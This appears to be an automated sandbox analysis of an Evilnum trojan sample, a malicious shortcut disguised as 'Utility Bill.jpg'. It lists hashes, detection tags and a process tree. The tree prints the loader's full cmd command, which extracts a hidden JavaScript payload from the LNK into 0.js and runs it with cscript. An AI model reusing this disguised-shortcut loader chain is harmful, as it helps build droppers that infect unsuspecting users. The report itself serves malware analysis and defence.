evilnum | 4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade

Analysis

Target

4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade.lnk
Size

88KB
MD5

3d0836ddc60ac65f9c43cc6732e5317c
SHA1

910382e02738661583813d212904742390c5008a
SHA256

4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade
SHA512

94f6374c5fc0d650eb8526efc86ee263dc7286fe47c6c8aacc04b42ab0dcc8994337df32c1f9fdae5c724941be0fee164aa11dd001cb96a71d3d9fe0553f2144

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 952 wrote to memory of 1612	952	cmd.exe	28
PID 952 wrote to memory of 1612	952	cmd.exe	28
PID 952 wrote to memory of 1612	952	cmd.exe	28
PID 1612 wrote to memory of 1724	1612	cmd.exe	29
PID 1612 wrote to memory of 1724	1612	cmd.exe	29
PID 1612 wrote to memory of 1724	1612	cmd.exe	29
PID 1612 wrote to memory of 1248	1612	cmd.exe	30
PID 1612 wrote to memory of 1248	1612	cmd.exe	30
PID 1612 wrote to memory of 1248	1612	cmd.exe	30
PID 1612 wrote to memory of 368	1612	cmd.exe	31
PID 1612 wrote to memory of 368	1612	cmd.exe	31
PID 1612 wrote to memory of 368	1612	cmd.exe	31
PID 1612 wrote to memory of 576	1612	cmd.exe	32
PID 1612 wrote to memory of 576	1612	cmd.exe	32
PID 1612 wrote to memory of 576	1612	cmd.exe	32
PID 1612 wrote to memory of 320	1612	cmd.exe	33
PID 1612 wrote to memory of 320	1612	cmd.exe	33
PID 1612 wrote to memory of 320	1612	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Utility Bill.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Util*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Util*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:1724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1248
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:576
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:320

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/952-54-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp

Filesize
8KB

Download